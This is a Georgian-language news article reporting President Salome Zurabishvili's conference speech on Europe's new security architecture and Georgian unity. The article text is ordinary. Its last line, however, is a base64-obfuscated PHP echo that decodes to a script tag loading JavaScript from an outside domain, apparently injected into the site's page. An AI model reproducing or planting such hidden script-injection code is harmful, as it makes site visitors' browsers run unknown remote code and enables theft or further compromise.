celsiusi
ავერსი საქკაბელი
მთავარია, ახალი შესაძლებლობებისა და საფრთხეების ფონზე, ჩვენ ვიცოდეთ, რა გვინდა და როგორ გვინდა, რა არის ჩვენი ფასეულობები. მთავარია, ვაჩვენოთ მსოფლიოს, თუნდაც თვითონ ორჭოფობდნენ, რომ შემდეგი ნაბიჯების გადადგმის შესახებ ჩვენი არჩევანი ურყევია, – ამის შესახებ  საქართველოს პრეზიდენტმა სალომე ზურაბიშვილმა კონფერენციაზე – „უსაფრთხოების ახალი არქიტექტურა ევროპაში და მისი გავლენა საქართველოზე“ სიტყვით გამოსვლისას განაცხადა.
 
მისივე თქმით, ამ მიზნის ქვეშ ყველა ძალა უნდა იყოს გაერთიანებული არა მხოლოდ სიტყვით, არამედ საქმით. როგორც სალომე ზურაბიშვილი ამბობს, პოლიტიკური ამბიციებით განპირობებული დაპირისპირება მხოლოდ ქვეყნის ინტერესებს არ ეწინააღმდეგება.
 
„მოგესალმებით ბატონო ელჩებო, პატივცემულო საზოგადოება. მოხარული ვარ, რომ დღეს აქ შეკრებილი საზოგადოება წარმოადგენს იმ ერთიანობას, რომელიც აუცილებელია, რათა საქართველო თავის ადგილზე დადგეს. ეს ერთიანობა საზოგადოების დაკვეთაა. შეიძლება, პოლიტიკურმა ძალებმა ჯერ კიდევ ვერ გაითავისეს ასეთი დაკვეთის არსებობა, რამეთუ საზოგადოებას არ აქვს ის საშუალებები, რომ თავისი დაკვეთა პოლიტიკურ პარტიებამდე მიიტანოს და გააგებინოს მათ თავისი ხმა. ამ პერიოდში, ეს დაკვეთა კიდევ უფრო გაძლიერდა, რადგან, როგორც კი ხედავ, რომ მსოფლიო შენ ირგვლივ იცვლება, რომ ჩნდება ახალი გამოწვევები, ახალი შესაძლებლობები, იქმნება ახალი არქიტექტურა (თუმცა, მგონი, არავინ იცის, რა და როგორი იქნება), ამ შემთხვევაში, მით უმეტეს პატარა ქვეყანაში, რომელიც თავს ისე დაცულად ვერ გრძნობს, კიდევ უფრო დიდი მოთხოვნაა, რომ იყოს გაერთიანებული და საზოგადოებას ვთავაზობდეთ ერთიან ხედვას. ალბათ ეს არის დღევანდელი შეკრების დანიშნულება, რომ სხვადასხვა აზრების შეჯერებით ჩვენ უფრო კარგად დავინახოთ, რა და როგორ შეგვიძლია, რომ ჩვენი ადგილი მოვიპოვოთ ამ ახალ მსოფლიოში. ფაქტია, როგორც ეს ხდება ყველაზე დიდი კრიზისების, ტრაგედიებისა და ომების შემდგომ, ამ ყველაფერს მოჰყვება გადაფასება და ახალი უსაფრთხოების ფორმების ძიება, რომელიც არ დაუშვებს ამ ტრაგედიების განმეორებას. ასე შეიქმნა თავის დროზე გაერო, ევროკავშირი, ნატო და დღესაც ამის მოლოდინში ვართ, რომ განახლდეს ეს ორგანიზაციები."– განაცხადა პრეზიდენტმა.
 
 
604
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");